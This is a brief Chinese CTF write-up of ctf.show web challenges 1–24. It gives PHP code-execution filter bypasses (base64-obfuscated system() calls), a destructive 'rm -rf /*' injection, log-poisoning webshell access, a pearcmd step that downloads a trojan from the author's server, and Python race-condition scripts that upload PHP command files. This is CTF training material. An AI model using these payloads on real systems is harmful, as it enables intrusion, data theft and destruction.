随便写一下
WEB1
?id='1000'
?id=-1 or id=1000
WEB2
?id='1000'
WEB3
?id='1000'
WEB4
?id='1000'
WEB5
?id=~~1000
WEB6
?id=~~1000
WEB7
?id=0b1111101000
WEB8
?flag=rm -rf /*
WEB9
?c=highlight_file('config.php');
WEB10
?c=passthru(%22cat%20config.php%22);
WEB11
?c=$a='sys';$b='tem';$d=$a.$b;$e=ca;$d($e."t config.php");
再查看源代码
WEB12
?c=$a=base64_decode("c3lzdGVt");$b=base64_decode("dGFjIGNvbmZpZy5waHA=");$a($b);
WEB13
?c=passthru(base64_decode('dGFjIGNvbmZpZy5waHA='))?>
WEB14
?c=echo `$_GET[a]`?>&a=tac config.php
WEB15
?c=include%20$_GET[a];&a=php://filter/read=convert.base64-encode/resource=config.php
WEB16
查md5
?c=36d
WEB17-21
日志包含
下面是蚁剑连接地址
http://2f06eecf-c349-471c-b2a0-4b77ee150725.challenge.ctf.show/?c=/var/log/nginx/access.log
WEB22
自己服务器上弄一个木马e.php
<?php
// Prints a one-line PHP file; the surrounding notes describe where this
// script is hosted and how its output is fetched.
echo "<?php system('tac 36d.php');?>";
?>
让靶机下载这个木马
http://xxxx/?c=pearcmd&+download+http://xxxxxxxxx/e.php
最后直接访问这个木马
http://xxxxx/e.php
获得百分之百的快乐
?1=>nl
?1=*
WEB23
把网上传的最常见的脚本的一部分内容改了一下
ts = int(time.mktime(time.strptime(txt[8:22], "%Y%m%d%H%M%S")))
fname = time.strftime("%Y%m%d%H%M%S", time.localtime(ts + 1))
改成下面内容，更好理解（注意：直接对整数加 1 在秒数跨过 59 时会得到 …60 这种并不存在的时间，只有原来 mktime/strftime 的写法才能正确向分钟、小时进位）
fname=str(int(txt[8:22])+1)
import requests,time,threading
# Base URL of the challenge instance; every request below is built on top of it.
subaddr = "http://d6fbf751-f250-4d8b-89dc-9da74c4ea044.challenge.ctf.show/"
def newThread(fun, *args):
    """Create, but do not start, a ``threading.Thread`` that calls ``fun(*args)``.

    Callers are expected to invoke ``.start()`` on the result themselves.
    """
    worker = threading.Thread(target=fun, args=args)
    return worker
def execphp(fname):
    """Fetch ``uploads/<fname>.php`` and print the body if it looks like a hit.

    Responses that are empty, that contain the 404 page, or that contain
    the platform's "container expired" notice ("容器已过期") are discarded.
    """
    url = "{}uploads/{}.php".format(subaddr, fname)
    body = requests.get(url).text
    noise = ("404 Not Found", "容器已过期")
    if body and not any(marker in body for marker in noise):
        print(body)
def check(fname):
    """Probe ``fname + "100"`` … ``fname + "399"`` concurrently, one thread each.

    ``fname`` is the predicted 14-digit timestamp; the three-digit suffix
    covers the trailing digits seen in the example filename
    (``uploads/20220818222707124.php``), which cannot be predicted exactly.
    """
    for suffix in range(100, 400):
        candidate = "{}{}".format(fname, suffix)
        newThread(execphp, candidate).start()
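def upload(delta_seconds=1):
    """Upload a probe file in a loop and hand the predicted next name to ``check``.

    Each response is expected to look like ``uploads/20220818222707124.php``
    (the example from the original comment); characters 8–22 are read as a
    ``YYYYMMDDHHMMSS`` timestamp. The file created by the *next* iteration
    is assumed to land ``delta_seconds`` later, so that timestamp is
    predicted and passed to ``check`` on its own thread. Runs until
    interrupted.

    Args:
        delta_seconds: gap between this upload's timestamp and the next one.
    """
    while True:
        file_data = {'file': ('anything.php', "<?php system(\"ls -l ../\");?>".encode())}
        r = requests.post(subaddr + "upload.php", files=file_data)
        txt = r.text
        print("uploaded:", txt)
        stamp = txt[8:22]
        if not stamp.isdigit():
            # Response is not the expected "uploads/<timestamp>.php" shape
            # (error page, expired container, …); nothing to predict from it.
            continue
        fname = _next_stamp(stamp, delta_seconds)
        newThread(check, fname).start()


def _next_stamp(stamp, delta_seconds):
    """Add ``delta_seconds`` to a ``YYYYMMDDHHMMSS`` string, carrying properly.

    ``str(int(stamp) + delta_seconds)`` is wrong whenever the seconds field
    crosses 59 (…0759 + 1 → …0760, which is not a time); round-tripping
    through ``time.mktime`` / ``time.localtime`` carries into the minute,
    hour and day fields.
    """
    ts = int(time.mktime(time.strptime(stamp, "%Y%m%d%H%M%S")))
    return time.strftime("%Y%m%d%H%M%S", time.localtime(ts + delta_seconds))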
if __name__ == '__main__':
    # upload() loops forever; the process runs until it is interrupted.
    upload()
WEB24
import requests,time,threading
# Challenge instance base URL; all request URLs below are built from it.
subaddr = "http://d6fbf751-f250-4d8b-89dc-9da74c4ea044.challenge.ctf.show/"
def newThread(fun, *args):
    """Wrap ``fun(*args)`` in an un-started ``threading.Thread`` and return it."""
    kwargs = {"target": fun, "args": args}
    return threading.Thread(**kwargs)
def execphp(fname):
    """GET ``uploads/<fname>.php`` and print the response body when it looks useful.

    Empty bodies, 404 pages and the platform's "container expired" page
    ("容器已过期") are ignored.
    """
    response = requests.get("".join((subaddr, "uploads/", fname, ".php")))
    text = response.text
    if not text:
        return
    if "404 Not Found" in text or "容器已过期" in text:
        return
    print(text)
def check(fname):
    """Spawn one probe thread per candidate name ``fname + "100"`` … ``fname + "399"``.

    The three-digit suffix covers the trailing digits of names like
    ``uploads/20220818222707124.php`` that cannot be predicted exactly.
    """
    candidates = (fname + str(n) for n in range(100, 400))
    for name in candidates:
        newThread(execphp, name).start()
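def upload(delta_seconds=3):
    """Upload a probe file in a loop and hand the predicted next name to ``check``.

    Each response is expected to look like ``uploads/20220818222707124.php``
    (the example from the original comment); characters 8–22 are read as a
    ``YYYYMMDDHHMMSS`` timestamp. The file created by the *next* iteration
    is assumed to land ``delta_seconds`` later (3 here, versus 1 in the
    previous challenge), so that timestamp is predicted and passed to
    ``check`` on its own thread. Runs until interrupted.

    Args:
        delta_seconds: gap between this upload's timestamp and the next one.
    """
    while True:
        file_data = {'file': ('anything.php', "<?php system(\"ls -l ../\");?>".encode())}
        r = requests.post(subaddr + "upload.php", files=file_data)
        txt = r.text
        print("uploaded:", txt)
        stamp = txt[8:22]
        if not stamp.isdigit():
            # Response is not the expected "uploads/<timestamp>.php" shape
            # (error page, expired container, …); nothing to predict from it.
            continue
        fname = _next_stamp(stamp, delta_seconds)
        newThread(check, fname).start()


def _next_stamp(stamp, delta_seconds):
    """Add ``delta_seconds`` to a ``YYYYMMDDHHMMSS`` string, carrying properly.

    ``str(int(stamp) + delta_seconds)`` is wrong whenever the seconds field
    crosses 59 (…0758 + 3 → …0761, which is not a time); round-tripping
    through ``time.mktime`` / ``time.localtime`` carries into the minute,
    hour and day fields.
    """
    ts = int(time.mktime(time.strptime(stamp, "%Y%m%d%H%M%S")))
    return time.strftime("%Y%m%d%H%M%S", time.localtime(ts + delta_seconds))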
if __name__ == '__main__':
    upload()  # never returns on its own: upload() is an endless loop